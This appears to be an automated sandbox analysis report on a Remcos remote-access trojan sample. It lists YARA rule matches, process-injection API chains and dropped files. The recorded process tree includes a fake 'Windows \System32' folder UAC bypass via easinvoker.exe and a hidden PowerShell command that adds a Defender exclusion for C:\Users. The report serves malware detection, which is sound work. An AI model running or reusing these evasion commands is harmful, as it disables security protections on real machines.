                  Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeFile deleted: C:\Windows \System32\NETUTILS.dll
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: String function: 02854824 appears 279 times
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: String function: 02854698 appears 51 times
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02867B80 LoadLibraryExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,VirtualProtectEx,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,0_2_02867B80
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0286C194 CreateProcessAsUserW,NtCreateProcess,WaitForSingleObject,CloseHandle,CloseHandle,0_2_0286C194
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_028679CC GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_028679CC
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0286BCF4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0286BCF4
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0286BC64 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0286BC64
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0286BDD8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0286BDD8
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02869D28 CreateProcessAsUserW,NtCreateProcess,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtFlushInstructionCache,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_02869D28
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02868328 GetModuleHandleW,GetProcAddress,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,RtlMoveMemory,RtlMoveMemory,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,CloseHandle,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,CloseHandle,0_2_02868328
                  Source: tTIYCp2sf4.exe, 00000000.00000002.558279383.000000007F300000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs tTIYCp2sf4.exe
                  Source: tTIYCp2sf4.exe, 00000000.00000003.540595825.0000000003971000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs tTIYCp2sf4.exe
                  Source: tTIYCp2sf4.exe, 00000000.00000003.537518251.000000007EE70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs tTIYCp2sf4.exe
                  Source: tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs tTIYCp2sf4.exe
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeFile created: C:\Users\Public\Libraries\Gjwyghlf.PIFJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@36/19@8/3
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\GjwyghlfO.bat" "
                  Source: tTIYCp2sf4.exeVirustotal: Detection: 47%
                  Source: tTIYCp2sf4.exeReversingLabs: Detection: 55%
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeFile read: C:\Users\user\Desktop\tTIYCp2sf4.exeJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\tTIYCp2sf4.exe C:\Users\user\Desktop\tTIYCp2sf4.exe
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\GjwyghlfO.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\easinvoker.exe C:\Windows \System32\easinvoker.exe
                  Source: C:\Windows \System32\easinvoker.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat
                  Source: unknownProcess created: C:\Users\Public\Libraries\Gjwyghlf.PIF "C:\Users\Public\Libraries\Gjwyghlf.PIF"
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat
                  Source: unknownProcess created: C:\Users\Public\Libraries\Gjwyghlf.PIF "C:\Users\Public\Libraries\Gjwyghlf.PIF"
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4wn1jn4.khu.ps1Jump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02866DC0 CoCreateInstance,0_2_02866DC0
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02857FB8 GetDiskFreeSpaceA,0_2_02857FB8
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_01
                  Source: C:\Users\Public\Libraries\flhgywjG.batMutant created: \Sessions\1\BaseNamedObjects\Rmc-5D7S76
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2164:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_01
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\Public\Libraries\flhgywjG.batFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: tTIYCp2sf4.exeStatic file information: File size 1113600 > 1048576
                  Source: Binary string: easinvoker.pdb source: tTIYCp2sf4.exe, 00000000.00000002.558279383.000000007F300000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.537518251.000000007EE70000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.542660336.000000000060C000.00000004.00000020.00020000.00000000.sdmp, easinvoker.exe, easinvoker.exe, 0000000B.00000002.546849860.00007FF780541000.00000020.00000001.01000000.00000006.sdmp, easinvoker.exe.5.dr, easinvoker.exe.0.dr
                  Source: Binary string: easinvoker.pdbH source: tTIYCp2sf4.exe, 00000000.00000002.558279383.000000007F300000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.540595825.0000000003971000.00000004.00000020.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.537518251.000000007EE70000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.542660336.000000000060C000.00000004.00000020.00020000.00000000.sdmp, easinvoker.exe, 0000000B.00000002.546849860.00007FF780541000.00000020.00000001.01000000.00000006.sdmp, easinvoker.exe.5.dr, easinvoker.exe.0.dr

                  Data Obfuscation

                  Source: C:\Users\Public\Libraries\flhgywjG.batUnpacked PE file: 17.2.flhgywjG.bat.400000.0.unpack
                  Source: C:\Users\Public\Libraries\flhgywjG.batUnpacked PE file: 20.2.flhgywjG.bat.400000.0.unpack
                  Source: C:\Users\Public\Libraries\flhgywjG.batUnpacked PE file: 22.2.flhgywjG.bat.400000.0.unpack
                  Source: C:\Users\Public\Libraries\flhgywjG.batUnpacked PE file: 17.2.flhgywjG.bat.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;
                  Source: C:\Users\Public\Libraries\flhgywjG.batUnpacked PE file: 20.2.flhgywjG.bat.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;
                  Source: C:\Users\Public\Libraries\flhgywjG.batUnpacked PE file: 22.2.flhgywjG.bat.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;
                  Source: Yara matchFile source: tTIYCp2sf4.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.tTIYCp2sf4.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\Public\Libraries\Gjwyghlf.PIF, type: DROPPED
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02869AE0 push 02869B18h; ret 0_2_02869B10
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_028762F4 push 0287635Fh; ret 0_2_02876357
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0285CBD0 push 0285CD56h; ret 0_2_0285CD4E
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0286BB4C push 0286BB84h; ret 0_2_0286BB7C
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02856374 push 028563CFh; ret 0_2_028563C7
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_028760AC push 02876125h; ret 0_2_0287611D
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02863050 push 0286309Dh; ret 0_2_02863095
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_028761F8 push 02876288h; ret 0_2_02876280
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02867904 push 02867981h; ret 0_2_02867979
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02876144 push 028761ECh; ret 0_2_028761E4
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02866940 push 028669EBh; ret 0_2_028669E3
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02862F44 push 02862FBAh; ret 0_2_02862FB2
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02856768 push 028567AAh; ret 0_2_028567A2
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0285D584 push 0285D5B0h; ret 0_2_0285D5A8
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02875548 push 02875760h; ret 0_2_02875758
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0286C56C push ecx; mov dword ptr [esp], edx0_2_0286C571
                  Source: C:\Windows \System32\easinvoker.exeCode function: 11_2_613CF021 pushfq ; iretd 11_2_613CF02A
                  Source: C:\Windows \System32\easinvoker.exeCode function: 11_2_613CFD00 pushfq ; ret 11_2_613CFD01
                  Source: C:\Windows \System32\easinvoker.exeCode function: 11_2_613D0DFE push rsp; iretd 11_2_613D0DFF
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02867B24 LoadLibraryA,GetProcAddress,WriteProcessMemory,FreeLibrary,0_2_02867B24
                  Source: flhgywjG.bat.0.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                  Source: easinvoker.exe.0.drStatic PE information: section name: .imrsiv
                  Source: netutils.dll.0.drStatic PE information: section name: .....
                  Source: netutils.dll.0.drStatic PE information: section name: .....
                  Source: netutils.dll.0.drStatic PE information: section name: ......
                  Source: netutils.dll.0.drStatic PE information: section name: ......
                  Source: netutils.dll.0.drStatic PE information: section name: ......
                  Source: netutils.dll.0.drStatic PE information: section name: ....
                  Source: netutils.dll.0.drStatic PE information: section name: ......
                  Source: netutils.dll.0.drStatic PE information: section name: ......
                  Source: netutils.dll.0.drStatic PE information: section name: ....
                  Source: netutils.dll.0.drStatic PE information: section name: ....
                  Source: netutils.dll.0.drStatic PE information: section name: ......
                  Source: netutils.dll.0.drStatic PE information: section name: /4
                  Source: netutils.dll.0.drStatic PE information: section name: /19
                  Source: netutils.dll.0.drStatic PE information: section name: /31
                  Source: netutils.dll.0.drStatic PE information: section name: /45
                  Source: netutils.dll.0.drStatic PE information: section name: /57
